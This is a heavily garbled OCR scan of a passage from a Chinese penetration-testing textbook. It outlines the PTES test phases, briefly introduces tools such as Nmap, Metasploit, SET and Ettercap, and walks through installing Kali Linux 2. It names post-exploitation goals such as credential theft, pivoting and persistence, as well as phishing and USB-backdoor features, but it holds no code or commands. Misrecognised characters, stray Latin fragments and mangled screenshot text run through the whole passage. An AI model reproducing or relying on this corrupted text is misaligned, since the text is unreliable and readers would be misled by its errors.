系 方式 〈 包 括 电 话 号 码 、 电 子 邮 箱 、 传 真 、 公 司 所 在 地 等 信息 ) ， 以 及 
域名 的 注册 和 到 期 时 间 。 通 过 搜索 引擎 查找 与 该 域名 相关 的 电子 邮箱 地 
址 、 博 客 、 文 件 等 。 
2. EJJP 

这 种 扫 摘 方式 的 技术 性 比较 强 ， 通 销 会 使 用 专业 的 扫描 工具 来 对 目 
标 进行 扫描 。 扫 摘 之 后 将 会 获得 的 信息 包括 目标 网 络 的 结构 、 目 标 网 络 


所 使 用 设备 的 类 型 、 目 标 主机 上 运行 的 操作 系统 、 目 标 主 机 上 所 开放 的 
蚊 品 、 目 标 主 机 上 所 提供 的 服务 、 目 标 主机 上 所 运行 的 应 用 程序 等 等 。 


1.2.3 ”威胁 建 模 阶段 
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中 重要 的 资产 。 例 如 我 们 的 客户 是 一 家 商业 机 构 ， 那 么 这 家 机 构 的 客户 
信息 融 是 重要 资产 。 

在 这 个 阶段 主要 考虑 如 下 问题 。 

e 哪些 资产 是 目标 中 的 重要 资产 。 

e. 攻击 时 米 用 的 技术 和 手段 。 

e 哪些 群体 可 能 会 对 目标 系统 造成 破坏 。 

。 这 些 群 体会 使 用 哪些 方法 进行 破坏 。 


分 析 以 上 不 同 群 体 发 起 攻击 的 可 能 性 ， 可 以 更 好 地 帮助 我 们 确定 滩 
透 测试 时 所 使 用 的 技术 和 工具 。 通 党 这 些 攻击 群体 可 能 是 : 


e 有 组 织 的 犯罪 机 构 。 
e A. 


e 脚本 小 于 。 





e 内 部 员工 。 
1.2.4 漏洞 分 析 阶 段 


这 个 阶段 是 从 目标 中 及 现 漏 镁 的 过 程 。 漏 调 可 能 位 于 目标 的 任何 一 
个 位 置 。 从 服务 硕 到 交换 机 ， 从 所 使 用 的 操作 系统 到 Web 应 用 程序 都 是 
我 们 要 检查 的 对 象 。 我 们 在 这 个 阶段 会 根据 之 二 情报 收集 时 友 现 的 目标 
的 操作 系统 、 开 放 疹 口 和 服务 程序 ， 碍 找 和 分 析 目 标 系 统 中 存在 的 漏 
洞 。 这 个 阶段 如 末 单 纯 依 徘 手 动 分 析 来 完成 的 话 ， 征 十 分 耗 时 耗 力 的 ， 
不 过 在 Kali Linux 2 系统 中 提供 了 大 量 的 网 络 和 应 用 汤 洞 评估 工具 ， 利 用 
这 些 工 具 可 以 目 动 化 地 完成 这 些 任 务 。 万 外 一 氮 需 要 所 到 的 征 ， 对 目标 
的 漏洞 分 析 不 仅 限于 软件 和 人 硬件 ， 还 需要 考虑 人 的 因 系 ， 也 束 古 长 时 间 
地 研究 目标 人 员 的 心理 ， 从 而 对 其 实施 欺 驴 以 便 达 到 渗透 目标 。 
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这 个 队 段 中 ， 我 们 关注 的 重点 是 ， 如 何 统 过 目标 的 安全 机 制 来 控制 
目标 系统 或 访问 目标 资源 。 如 果 我 们 在 上 一 阶段 中 顺利 完成 了 任务 ， 那 
么 这 个 阶段 就 可 以 准确 顺利 地 进行 。 这 个 阶段 的 渗透 测试 应 该 具有 精准 
的 范围 。 漏 铀 利用 的 主要 目标 是 获 取 我 们 之 前 评估 的 重要 资产 。 节 后 进 
行 渗透 时 还 应 该 考虑 成 功 的 概率 和 对 目标 可 能 造成 破坏 的 最 大 影 啊 。 


目前 最 为 流行 的 漏洞 渗透 程序 框架 承 是 Metasploit 了 。 通 第 这 个 Er 
段 也 是 最 为 激动 人 心 的 时 刻 ， 因 为 渗透 测试 者 可 以 针对 目标 系统 使 用 对 
应 的 入 侵 模 块 获得 控制 权限 。 
1.2.6 ”后 渗 史 攻击 阶段 

这 个 阶段 和 上 一 个 阶段 连接 得 十 分 崇 密 ， 作 为 一 个 渗透 测试 者 ， 必 
须 尽 可 能 地 将 目标 被 渗透 后 所 可 能 产生 的 后 果 模 拟 出 来 。 在 这 个 阶段 可 
能 要 完成 的 任务 包括 : 


e 控制 权限 的 提升 。 


登录 凭证 的 禄 取 。 

重要 信息 的 获取 。 

利用 目标 作为 跳板 。 

建立 长 期 的 控制 通 赴 。 

这 个 阶段 的 主要 目的 是 同和 客户 展示 当前 网 络 存在 的 问题 会 市 来 的 风 


BR. 


1.2.7. 报告 阶段 


这 个 阶段 是 整个 渗透 测试 阶段 的 最 后 一 个 阶段 ， 同 时 也 有 是 了 最 能 体现 
我 们 工作 成 果 的 一 个 阶段 ， 我 们 要 将 之 前 的 所 有 友 现 以 书面 的 形式 提交 
给 客户 。 实 际 上 ， 这 个 报 生 也 是 客户 唯一 的 需求 。 我 们 必须 以 和 傈 单 百 接 
且 尽 量 避 免 大 量 专业 术语 的 形式 同 各 户 汇 报 测试 目 标 中 存在 的 问题 ， 以 
及 可 能 产生 的 风险 。 这 份 报告 中 应 该 指出 ， 目 标 系统 最 重要 的 威胁 、 合 
用 渗透 数据 生成 的 表格 和 图 标 ， 以 及 对 目标 系统 人 存在 问题 的 修复 方案 、 
当前 安全 机 制 的 改进 建议 等 。 


1.3 ”网 络 安全 渗透 测试 的 钟 用 工具 


fEBackTrack (也 就 是 Kali Linux 的 前 身 ) 出 现 之 前 ， 执 行 网 络 安全 
渗透 测试 的 方法 很 难 统一 。 这 主要 是 因为 在 Linux 平 台 上 存在 大 量 的 渗 
透 测 斌 工具， 而 渗透 测试 者 们 又 往往 会 有 不 同 的 选择 。 这 种 情况 的 后 果 
怠 是 在 进行 渗透 测试 的 教学 或 者 塔 训 时 ， 很 难 有 一 个 统一 规范 的 体系 。 


BackTrack 系 统 出 现 以 后 ， 在 这 个 系统 中 集成 了 大 量 的 优秀 工具 。 
而 且 BackTrack 按 照 这 些 工 具 的 用 途 进行 了 分 类 ， 这 样 我 们 在 进行 网 络 
安全 渗透 测试 时 束 无 需 面 对 数量 众多 的 工具 眼花 综 乱 了。 下 向 我 们 先 就 
世界 上 几 革 最 为 流行 的 渗透 测试 工具 进行 简单 介绍 ， 这 些 工 具 也 将 会 在 
本 书 中 的 实例 讲解 到 。 


1. Nmap 
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之 国 2》 中 ，Tritnity 就 曾 使 用 Nmap 攻 击 SSH 服务 ， 从 而 破坏 了 发 电厂 的 
工作 。Nmap 是 由 Gordon Lyon 设 计 并 实现 的 ， 于 1997 开 始 及 布 。Gordon 
Lyon 最 初 设计 Nmap 的 目的 只 是 希望 打造 一 和 珀 强大 的 端口 扫 拉 工具。 但 
是 随 看 时 间 的 友 展 ，Nmap 的 功能 越 来 越 全 面 。2009 重 7 月 17 日 ， 开 源 网 
络 安全 扫描 工具 Nmap 正 式 发 布 了 5.00 版 ， 这 是 自 1997 年 以 来 最 重要 的 发 
布 ， 代 表 看 Nmap 从 简单 的 网 络 扫 换 软件 变 时 为 全 方位 的 安全 工 其 组 
络 中 有 多 少 台 主机 ， 每 台 主 机 运行 的 操作 系统 ， 每 台 主 机 运行 的 应 用 程 
序 ， 其 至 每 台 主 机 上 面 存 在 的 湄 渔 ， 这 些 信息 都 可 以 利用 Nmap 获 得 。 


2. Maltego 


Maltego 和 Nmap 一 样 都 是 信息 收集 工具 ， 但 是 两 者 的 工作 方式 全 然 
不 同 。Nmap 是 典型 的 主动 扫 摘 工具 ， 而 Maltego 则 是 一 秋 极 为 优秀 的 入 
动 扫描 工具 。 和 和 Nmap 获取 的 操作 系统 、 病 口 、 服 务 守 信息 不 同 ， 
Maltego 获 取 的 往往 是 一 些 网 络 使 用 者 的 信息 。 利 用 Maltego， 我 们 束 可 
以 仅仅 从 一 个 域名 找到 和 它 有 关联 的 大 量 信息 ， 并 把 这 些 信息 整合 。 此 
E IM 目 定 义 行为 ， 从 而 整合 出 最 适合 用 户 
ge“ 情报 拓扑 ”。 


3. Recon-NG 


Recon-ng 是 一 个 由 Python 语 言 编写 的 全 面 Web 探 测 框 架 ， 目 前 这 个 
框架 中 包含 拥有 超过 80 个 独立 的 模块 。 因 此 并 不 能 简 持 地 将 Recon-ng 看 
作 是 一 个 主动 扫描 工具 或 者 被 动 扫 摘 工 具 。 筷 提供 了 一 个 强大 的 开源 
Web 探 测 机 制 ， 帮 助 渗透 测试 人 员 快 速 彻 辰 地 进行 探测 。 


4. OpenVAS 
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为 你 只 需要 把 要 测试 目标 的 IP 填 进 OpenVAS， 它 束 会 把 目标 操作 系统 上 
存在 的 漏 铜 显示 出 来 。 也 束 是 说 你 需要 做 的 ， 仅 仅 是 填写 一 个 了 地 址 而 
己 ， 而 得 到 的 却 是 一 份 天 于 目标 系统 存在 漏洞 的 详细 报告 。OpenVAS 可 
以 分 成 两 个 核心 部 分 ， 一 个 是 网 络 漏洞 测试 引擎 ， 另 一 个 是 网 络 漏 酒 
库 。 它 的 工作 原理 束 古 由 测试 引擎 回 目 标 友 运 特制 的 数据 包 ， 然 后 将 目 
标的 回应 与 网 络 漏洞 库 中 的 样本 进行 比较 ， 如 采 匹 配 成 功 ， 则 可 以 认为 
IFE Zini] 


5. Metasploit 
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络 安全 行业 是 无 人 不 知 。 如 果 说 OpenVAS 的 用 途 是 发 现 目标 的 漏洞 ， 那 
么 Metasploit 葡 是 开局 漏 铀 的 钥匙 。 拥 有 了 这 把 钥 是 的 人 ， 可 以 轻 而 多 
举 完 成 对 目标 的 滩 表 。 这 于 强大 的 工具 是 H.D. Moore 在 2003 年 开发 的 ， 
当时 它 只 集成 了 少数 几 个 可 用 于 渗透 测试 的 工具 。 但 是 这 确实 是 一 个 章 


命 性 的 突破 ， 在 Metasploit 出 现 之 前 ， 渗 透 测试 者 总 需要 目 己 去 编写 源 
洞 渗 透 模块 ， 或 者 通过 各 种 途径 寻找 漏洞 渗透 模块 。 而 Metasploit 帮 助 
渗透 测试 者 从 这 样 的 工作 中 解放 了 出 来 ， 它 集成 了 大 量 的 漏洞 渗透 模 
块 ， 统 一 了 这 些 模块 使 用 方法 ， 并 且 提 供 了 大 量 的 攻击 载 何 和 辅助 功 
能 。 可 以 这 样 说 “有 了 Metasploit， 任 何人 都 可 以 如 同 电 影 中 的 黑 洛 一 样 
轻松 地 入 侵 目 标 。” 


6. SET 


性 会 工程 学 是 一 门 新 兴 的 和 学科， 在 最 近 这 些 年 中 这 门 和 学科 得 到 了 迅 
速 及 展 。 越 来 越 多 的 墨客 入 侵 事 件 都 与 社会 工程 学 分 不 开 。 


我 们 经 篆 会 听 说 钓鱼 邮件 、 钓 鱼网 站 之 类 的 说 法 ， 这 些 其 实 都 是 社 
会 工程 学 的 典型 应 用 。David Kenned 特 意 使 用 Pyhotn 编 写 了 一 个 功能 众 
多 的 社会 工程 学 工具 包 (SET) 。SET 利 用 人 们 的 好 奇 心 、 信 任 、 贪 禁 
及 一 些 轧 巷 的 错误 来 进行 攻击 。 在 这 个 工具 包 中 提供 了 大 量 功 能 ， 例 如 
发 送 木 马 邮 件 、 生 成 假 旱 网 站 、 利 用 U 檀 传播 后 门 等 ， 目 前 该 工具 包 已 
经 成 为 渗透 测试 行业 部 普 实 施 社 会 工程 学 攻击 的 标准 。 


7. Ettercap 
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应 用 艺 围 有 限 ， 但 是 在 其 应 用 范围 之 内 能 力 极 为 强大 。 在 一 个 网 络 中 ， 
有 的 计算 机 可 能 安全 性 能 较 遍 ， 因 而 难以 渗透 ;而 有 的 计算 机 安全 性 能 
较 和 大， 因而 容易 渗透 。 这 时 我 们 残 可 以 首先 选择 那些 安全 性 能 较 大 的 主 
机 进行 渗透 。 然 后 就 是 Ettercap 这 类 工具 大 显 里 手 的 时 候 ， 可 以 说 利用 
Ettercap 渗 透 一 台 同 一 子 网 的 主机 是 一 件 易 如 反 营 的 事情 。 


8. Burpsuite 


随 看 互联 网 的 快速 友 展 ， 网 络 安全 的 侧重 点 已 经 同 Web 应 用 转移 。 
近年 来 ， 我 们 在 进行 网 络 安全 渗透 测试 时 主要 的 对 象 大 都 是 web 应用。 
目前 所 有 的 单位 都 会 对 目 身 所 使 用 的 Web 应 用 进行 严格 的 测试 。 同 时 ， 
Web 应 用 的 问题 也 是 近年 来 网 络 安全 的 重 灾 区 。SQL 注 入 、 路 站 、 
cookie 盗 取 等 问题 层出不穷 。BurpSuite 就 是 用 于 一 款 专 门 测 试 Web 应 用 
程序 的 集成 平台 。BurpSuite 分 为 试用 版 和 专业 版 ， 其 中 包含 了 大 量 针 对 
Web 应 用 测试 的 工具 ， 而 且 BurpSuite 中 为 这 些 工 具 设计 了 许多 接口 ， 我 


们 还 可 以 自行 编写 脚本 以 完善 它 的 功能 。 
9. Wireshark 


RRM, Wireshark f h 3X € 1828384 LE. CHER 
监控 网 络 的 流量 。 但 是 我 每 次 都 会 跟 我 的 学 生 襄 ， 熟 练 使 用 Wireshark 古 
网 络 渗透 测试 专业 的 必 备 技能 。Wireshark 主 要 有 两 个 功能 : 一 是 可 以 监 
控 网 络 ， 发 现 网 络 中 的 那些 恶意 流量 ， 并 找 出 这 些 恶 意 流 量 的 源 涉 ; 二 
是 可 以 对 应 用 的 工具 进行 调试 ， 有 些 时 候 我 们 在 进行 渗透 名 试 的 时 候 ， 
运行 了 工具 却 完全 没有 反应 ， 这 时 很 难 判断 到 展 是 这 个 工具 本 刁 的 问 
题 ， 还 是 目标 的 问题 。 利 用 Wireshark 我 们 就 可 以 查看 这 个 工具 是 否 正 常 
地 发 迹 出 去 了 数据 包 ， 从 而 找到 问题 的 源头 。 为 外 通过 这 种 调试 也 可 以 
帮助 学 习 这 些 工 具 的 设计 原理 。 


10. Dradis 


几乎 我 认识 的 所 有 人 部 对 计算 机 行业 有 这 样 一 个 看 法 ， 编 瑟 程序 才 
是 真实 的 本 领 ， 文 档 的 编写 则 不 十 那么 的 午 要 。 因 此 我 们 经 党 看 到 一 些 
很 优秀 的 程序 员 写 出 的 天 书 一 般 的 文档 。 渗 透 测试 也 是 一 样 ， 虽 然 我 们 
在 前 6 个 阶段 付出 了 大 量 的 努力 ， 但 是 最 后 呈现 在 用 户 面 前 的 只 有 一 份 
报 各 。 那 么 这 份 报 各 也 将 决定 看 客户 对 我 们 的 工作 是 任 洱 意 。 


渗透 训 试 报 各 的 编写 是 一 件 相 当 复 林 的 工作 ， 不 过 好 在 现在 有 一 些 
相当 优 务 的 工具 可 以 帮助 我 们 来 完成 。 其 中 的 Dradis 框 架 束 是 一 个 极为 
优 夯 的 开源 协作 和 报 各 平台 。 它 古 由 Ruby 开 友 的 一 个 独立 的 平台 。 利 用 
EE mM NN 
详实 的 报告 。 


1.4 ”小结 


在 本 量 中 ， 我 们 对 什么 是 网 络 安全 渗透 测试 ， 以 及 如 何 开 展 网 络 安 
全 渗透 测试 进行 了 介绍 。 和 营 握 渗透 测试 的 标准 对 于 我 们 后 来 的 学 习 有 很 
大 的 帮助 。 如 果 你 硕 望 对 本 章 讲 解 的 网 络 安全 渗透 测试 标准 有 更 深入 的 
了 解 ， 可 以 访问 www.pentest-standard.org， 在 这 个 网 站 中 极为 详细 地 介 
绍 了 渗透 测试 的 7 个 阶段 。 


在 本 章 的 最 后 我 们 还 介绍 了 一 些 当 今世 界 上 最 为 优 邦 的 渗透 测试 工 
具 。 在 后 面 的 章节 中 我 们 将 对 这 些 工 具 的 使 用 进行 详细 的 案例 讲解 。 在 
下 一 和 章 中 ， 我 们 将 会 详细 讲解 Kali Linux 2 的 使 用 。 


第 2 章 


Kali Linux 2 使 用 基础 


在 现实 生活 中 经 昔 有 人 会 问 我 一 个 问题 , “墨客 是 不 是 都 不 用 
Windows 操 作 系 统 ? ”。 有 其实 这 也 是 很 多 人 都 想 要 了 解 的 一 个 问题 ， 这 
个 问题 的 答 条 并 不 是 绝对 的 。 但 是 大 多 数 从 事 网 络 安全 的 专家 的 确 不 会 
选择 使 用 Windows 来 完成 目 己 的 工作 。 那 么 下 一 个 问题 就 是 : 在 进行 网 
络 安全 渗透 测试 时 ， 要 使 用 什么 操作 系统 呢 ? 


在 本 章 中 将 会 介绍 世界 上 最 为 著名 的 渗透 测试 系统 
2。 在 这 一 章 中 我 们 将 会 围绕 以 下 3 个 问题 展开 学 习 。 


e Kali Linux 2 人 简介 

e Kali Linux 2 安装 

e Kali Linux 2 的 和 常用 操作 
e VMware 的 高 级 操作 


Kali Linux 





2.1 Kali Linux 2 简介 


Kali Linux 2 是 一 个 面向 专业 人 士 的 渗透 测试 和 安全 审计 的 操作 系 
统 ， 它 是 由 之 前 大 名 易 易 的 Back Track 系统 发 展 而 来 。Back Track 系 统 
曾经 是 世界 上 最 为 优秀 有 的 渗透 测试 操作 系统 ， 取 得 了 极 大 成 功 。 之 后 
Offensive Security 对 Back Track 进行 了 升级 改造 ， 并 在 2013 年 3 月 ， 推 出 
了 加 新 的 Kali Linux 1.0， 相 比 起 Back Track, Kali Linux 提 供 了 更 多 更 新 
的 工具 。 之 后 ，Offensive Security 每 隔 一 段 时 间 都 会 对 Kali 进 行 更 新 ， 
在 2016 年 又 推出 了 功能 更 为 强大 的 Kali Linux 2。 有 目前 最 新 的 版 本 是 2017 
年 推出 的 Kali Linux 2017.1。 在 这 个 版 本 中 包含 有 13 个 大 类 超过 了 300 个 
的 各 种 程序 ， 儿 乎 涵盖 了 当前 世界 上 所 有 优秀 的 渗透 测试 工具 。 如 果 你 
之 前 没有 使 用 过 Kali Linux 2 ， 那 么 相信 在 你 打开 它 的 瞬间 ， 绝 对 会 被 
里 面 数量 众多 的 工具 所 宕 撼 。 


需要 注意 的 一 点 是 ，Kali Linux 本 里 并 不 是 一 个 新 的 操作 系统 ， 而 
是 一 个 基于 Debian 的 Linux 发 行 版 。 如 果 你 之 前 熟悉 Debian 的 话 ， 那 么 使 
用 起 来 Kali Linux 将 会 十 分 容易 。 不 过 Kali Linux 也 提供 了 类 似 Windows 
EI 即使 你 此 前 完全 没有 使 用 Linux 经 验 的 话 ， 也 可 以 
未 r 


2.2 Kali Linux 27z?x 
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事 。 而 且 和 只 能 安装 在 计算 机 上 的 Windows 操 作 系 统 不 同 ，Kali Linux 可 
以 说 是 一 个 几乎 能 安装 到 任何 智能 设备 上 的 操作 系统 。 计 算 机 、 平 板 、 
手机 、 虚 拟 机 、U 盘 播放 设备 、 光 盘 播 放 设 备 都 可 以 成 为 Kali Linux 的 载 
体 ， 另 外 现在 极为 流行 的 Raspberry Pi( 中 文 名 为 “ 树 侮 派 ”， 人 简写 为 RPi) 
也 可 以 安装 KaliLinux。 其 至 连 亚 蕊 进 公 司 推出 的 云 计算 服务 平台 AWS 
中 也 提供 了 装 有 Kali Linux 系 统 的 主机 。 


下 面 我 们 束 来 介绍 其 中 几 种 最 为 弟 用 的 安装 方式 。 
22.1 将 Kali Linux 2 安装 在 硬盘 中 


我 们 首先 要 到 https:/www.kali.org/downloads/ 下 载 到 Kali Linux2 的 安 
装 镜像 ， 本 书 采 用 的 Kali 版 本 为 2017.1 版 。 如 果 你 之 前 为 计算 机 安装 过 
Windows 操 作 系 统 的 话 ， 那 么 就 会 发 现 这 个 安装 过 程 其 实 很 简单 ， 下 面 
我 们 以 完整 版 的 32 位 Kali 安 装 为 例 。 


Kali Linux2 对 系统 硬件 的 需求 很 小 ， 几 乎 现在 所 有 的 计算 机 都 可 以 
满足 。 当 然 在 更 高 配置 的 计算 机 上 可 以 更 加 流畅 地 运行 Kali Linux2。 下 
面 列 出 了 官方 给 定 Kali Linux2 安 装 的 最 低 硬 件 要 求 : 


e Kali Linux 2Z22X jg b d 820GB IP] f A T [R] o 

e 对 于 i386 和 AMD 6422 jJ, Kali Linux 2 推荐 2GB 或 者 2GB 以 上 的 内 
存 空间 ， 最 小 为 1GB。 

e CD-DVD 启 动 /USB 启 动 支持 。 


下 面 我 们 开始 Kali Linux 2 的 安装 过 程 ， 这 个 过 程 可 以 分 成 两 个 步 


又 。 第 一 步 先 将 镜像 文件 刻录 到 U 盘 或 者 光盘 上 ， 步 再 通过 U 盘 或 
者 光盘 启动 来 安装 E mU. 


首先 来 介绍 如 何 将 下 载 好 的 kali-Linux-2017.1-i386. eya 
WERUAEUSL.SETGJUEASULTL4 aH TURT, MURER 
如 何 刻 录 到 U 盘 的 步骤 。 


| 步骤 1 首先 我 们 使 用 UltraI SO 打开 下 载 的 kali-Linux-2017.1-i386.iso 
文件 ， 如 图 2-1 所 示 。 


选项 (O) ”帮助 (H) 











xu Geo me; 
文件 名 








创建 文件 校 验 .… 
验证 文件 校 验 .… 


打开 工程 文件 。  Ctri+Alt+O 
工程 文件 另存 为 .。 Ctrl+Alt+S 
导入 IML.. 

IML 编译 为 ISO... 











* | m 
Toxa W y a 路 径 : C: Users adninWDocunents My ISO Files 


太 小 ”类 型 日 期 /时 间 

















图 2-1 ”使 用 UltraI SO 打开 Kali Linux 2 的 镜像 文件 


步 桑 2” 单 击 逐 单 栏 上 的 “局 动 ? 人 选项， 然后 在 弹出 的 染 单 中 选中 “ 写 
入 便 盘 映像 ”， 如 图 2-2 所 示 。 


S) UltralSO - DA\ 迅 雪 下 载 \kali-linux-2017.1-1386.lso c 
XAA 操 fF(A) | 启动 (8) IAM EURO) SEC) — 本 

De-a p SERERE.. Te 大 小 总 计 : 
me 














E 写 入 软盘 映像.. 
Ae 制作 硬盘 映像 文件 .… 











大 小 ”类 型 日 期 /时 间 
二 — = 159 x 2017-04-18 15:26 
从 软盘 /硬盘 驱动 器 捏 取 引 导 遍 区 .… 6,364 KB x 2011-04-18 15:26 


由 3 dists 
H- efi M CD/DVD 提取 引导 文件 .… 942 KB x 2017-04-18 15:17 |E 
à B54 KB 一 2017-04-16 15:27 
全 firmware | 导 文 
id jp 载 引 fE. 0 一 2017-04-16 15:17 


由 B install 尿 存 引 导 文 
^" isolinux 引导 文件 - 99,201 KB xx 2017-04-18 15:26 
: 清除 引导 信息 708 KB x 2017-04-18 15:27 


[^ 生成 启动 信息 表 e Ded Ls x 2017-04-16 15:26 
sess 126, 364 KB 2 2017-04-18 15:1T 
o 制作 多 93 KB 二 2017-04-16 15:26 


FF antnrunm inf 133 Setnn Tnfnrmatinn 2?n1T-D4-1R8 15:?T 
4 | " + 


T LEXA e 2 a PÍZ: C: \Users\admin\Documents\Ny ISO Files 
.|| 文件 名 太 小 ”类 型 日 期 /时 间 
































| 版 权 所 有 (c)2002-2016 EZB Systems, Inc. 光盘 目录 : 7 X, 1208 KB 本 地 目录 : 0 xit, 0 K 


图 2-2 ”选中 “与 入 使 盘 镜 像 ” 


步骤 3 ”在 弹出 的 “ 写 入 使 盘 映像 ? 深 音 中， 首先 选中 “人 笠 却 化 ?对 U 盘 
中 的 数据 进行 格式 化 ， 然 后 日 击 “ 写 入 ”按钮 ， 如 图 2-3 所 示 。 


消息 
时 间 事件 


Windows T v6.1 Build T8601 (Service Pack 1) 
上 午 09:34:23 (J:, 4 GB)SMI USB DISK 1100 








m 

















硬盘 驱动 器 : | (:, 4 GB)SMI USB DISK 1100 — «| 加 | 刻录 核验 


映像 文件 : :迅雷 下 载 \kali-linux-2017. 1-i386. iso 


EA 
BREIE: LIT 


完成 比例 : 0% 已 用 时 间 : 00:00:00 PAATE]: 00:00:00 





ES: OKB/ s 


TED RE 





图 2-3 ”将 镜像 中 的 文件 写 入 到 U 盘 中 


现在 我 们 已 经 制作 好 了 一 张 Kali Linux 2 的 系统 安装 各 了 ， 那 么 接 下 
来 束 可 以 在 计算 机 中 安装 系统 了 了 人。 首先 我 们 二 要 将 计算 机 设置 为 U 檀 启 
动 ， 然 后 执行 如 下 步骤 。 


步骤 1 局 动 计算 机 后 ， 你 就 可 以 看 到 Kali Linux 2 的 局 动 界 面 了 ， 


这 里 还 列 出 了 Kali Linux2 设 计 者 的 忠告 :“the quieter you become, the 
more you are able to hear” CRZ, MERMERE) 。 在 这 里 我 们 需 
要 选择 安 闫 的 类 型 ， 将 Kali Linux 22225 $0 f Z4 3-8 28 730 "Install? CA 
于 文本 的 安装 方式 ) 和 第 8 项 “Graphical Install”( 基 于 图 形 化 的 安装 方 
式 ) 两 种 ， 我 们 这 里 以 “Graphical Install” 为 例 ， 如 图 2-4 所 示 。 


KALI 


ANE quieter you LEGOME bHe mee you are able to hear" 


Boot menu 


Live (B8B5-paeJ 

Live (B8b5-pae failsafe)J 

Live {forensic model 

Live USB- Persistence (check kali.org^prst) 
Live USE Encrypted Persistence (check kali.oarg^prst) 
Install 

Graphical install 

Install with speech synthesis 

Advanced options 





图 2-4 Kali Linux2 的 启动 界面 


步骤 2 接 下 来 选择 安装 系统 所 使 用 的 语言 ， 这 里 面 我 们 选择 “中 文 
简体 ”， 如 图 2-5 所 示 。 


Select a language 


Choose the language to be used for the installation process. The selected language will also be the 
default language for the installed system. 








Language: 
Chinese (Simplified) - ”中 文 (简体 ) 
Chinese (Traditional) -  mx(st9) 
Croatian - Hrvatski 
Czech - Cestina 
Danish - Dansk 
Dutch - Nederlands 
Dzongkha - Žr 
English - English 
Esperanto - Esperanto 
Estonian - Eesti 
Finnish - Suomi 
French - Français 
Galician - Galego 
Georgian - do603e»a 
German - Deutsch 

L modu Th mne An 








Screenshot | | GoBack | 
图 2-5 ”安装 语言 选择 采 早 


步骤 3 ” 接 下 来 系统 会 弹出 一 个 提示 ， 如 图 2-6 所 示 ， 提 醒 我 们 使 用 
简体 中 文 的话 ， 系 统 并 不 会 完全 以 中 文 显示 ， 很 多 地 方 仍然 会 以 繁体 中 
文 或 者 英文 显示 。 这 里 我 们 选择 “是 ”。 


选择 一 种 语言 


所 选 语言 的 安装 程序 翻译 不 完整 。 
如 果 您 执行 纯粹 的 默认 安装 以 外 的 操作 ， 有 很 大 可 能 性 某 些 对 话 框 会 以 繁体 中 文 显 示 ， 或 者 ， 如 果 那 也 不 可 用 ， 则 会 以 英文 显示 。 


除非 您 懂得 备用 语言 ， 否则 推荐 您 选择 另 一 种 语言 或 终止 安装 程序 。 
AMENES RTR ? 
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图 2-6 JEM A 
步骤 4 选择 我 们 所 在 的 区 域 ， 如 图 2-7 所 示 ， 选 择 “ 中 国 ”。 


选择 的 区 域 将 被 用 于 设置 您 的 时 区 以 及 其 他 例如 帮助 决定 系统 区 域 。 通 常 这 应 该 为 您 所 居住 的 国家 。 


这 是 根据 您 所 选择 的 语言 产生 的 短 列表 。 如 果 没 有 列 出 您 的 区 域 ， 请 选择 "其 他 "。 
国家 、 领 地 或 地 区 : 





其 他 /other 











图 2-7” 区域 选择 列表 
步骤 5 选择 要 使 用 的 键盘 设置 ， 这 里 选择 “汉语 ”"， 如 图 2-8 所 示 。 


WIES BE : 

(æi: 

英国 英语 

Bulgarian (BDS layout) 
保加利亚 语 (phonetic 布局 ) 
Burmese 

加 拿 大 法 语 

加 拿 大 -多 语言 

加 泰 罗 尼 亚 语 

克罗地亚 语 

捷克 语 

丹麦 语 

DEA 

多 冉 柯 键盘 (Dvorak) 

不 丹 语 

世界 语 
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步骤 6 现在 需要 为 你 的 系统 输入 一 个 主机 名 。 在 这 个 例子 中 ， 我 
们 输入 “Kali” 作 为 主机 名 ， 如 图 2-9 所 示 。 











请 输入 系统 的 主机 名 。 


XH: 


主机 名 是 在 网 络 中 标示 您 的 系统 的 一 个 单词 。 如 果 您 不 知道 主机 名 是 什么 ， 请 询问 网 络 管理 员 。 如 果 您 正在 设置 内 部 网 络 ， 那 么 可 以 随意 写 个 


RAME | 返回 || mm 
图 2-9 ”设置 主机 名 
步骤 7 在 这 里 要 输入 一 个 域名 ， 如 果 没 有 的 话 ， 随 意 填 写 一 个 即 
可 ， 如 图 2-10 所 示 。 


域名 : 


域名 是 您 的 互联 网 地 址 的 一 部 分 ， 附 加 在 主机 名 之 后 。 它 通常 是 以 .com、.net、.edu 或 .org 结尾 。 如 果 您 正在 设置 一 个 内 部 网 络 ， 您 可 
以 随意 写 一 个 ， 但 是 要 确保 您 所 有 计算 机 的 域名 都 是 一 样 的 。 


| RERE S 


返回 || æg 
图 2-10 KARA 


接 下 来 为 使 用 该 系统 的 root 用 户 创 建 一 个 密码 ， 这 个 密码 应 
复杂 一 些 ， 如 图 2-11 所 示 。 


设置 用 户 和 密码 

您 需要 为 “root” 用 户 ( 即 系统 管理 员 帐号 ) 设置 一 个 密码 。 如 果 和 恶意 或 无 资格 的 用 户 获 得 了 root 权限 将 可 能 会 导致 灾难 性 的 结果 ， 因 此 您 应 
该 小 心地 选择 一 个 不 容易 猜 出 的 root 密码 。 它 不 应 该 是 一 个 能 在 字典 中 找 得 到 的 单词 或 者 一 个 跟 您 本 人 有 紧密 关系 的 词语 。 

一 个 安全 的 密码 应 该 是 由 字母 、 数 字 和 标点 符号 组 合 而 成 ， 而 且 要 定期 更 新 。 

根 用 户 不 应 使 用 空 密码 。 如 果 您 将 此 留 空 ， 根 用 户 账户 会 被 禁用 且 系 统 的 初始 用 户 账 户 会 被 给 予 权限 通过 “sudo” 命 令 获 得 根 用 户 权限 。 


请 注意 ， 您 将 不 会 看 到 所 输入 的 密码 内 容 。 
Root 用 户 密码 : 


asos | 
[| Show Password in Clear 





为 了 保证 您 的 密码 正确 无 误 ， 请 再 次 输入 相同 的 root 密码 。 

IBEX SA SEAR UREE : 

TII | 
C] Show Password in Clear 








图 2-11 Kali Linux 21z EZ 4d 


步骤 9 ”这 时 我 们 需要 议 置 分 区 ， 默 认 情 况 可 以 选择 “使 用 整个 磁 
盘 ? 即 可 ， 如 图 2-12 所 示 。 这 里 还 提供 了 LVM 功 能 ，LVM 的 全 称 
征 “Logical Volume Manager" OZ HAS IER), fERILVMWHIULTEZ 
完成 后 管理 分 区 和 调整 分 区 大 小 。 对 于 刚 接 触 Kali Linux 2 的 用 户 并 不 推 
存 使 用 LVM。 如 果 你 对 Linux 非 第 熟 壬 的 话 ， 也 可 以 选择 “于 动 ”。 


磁盘 分 区 


安装 程序 能 够 指导 您 采用 各 种 标准 方案 进行 磁盘 分 区 。 如 果 您 喜欢 ， 您 也 可 以 手动 操作 。 如 果 选 择 了 分 区 向 导 ， 稍 后 您 还 是 有 机 会 检查 和 修改 
分 区 设置 结果 。 


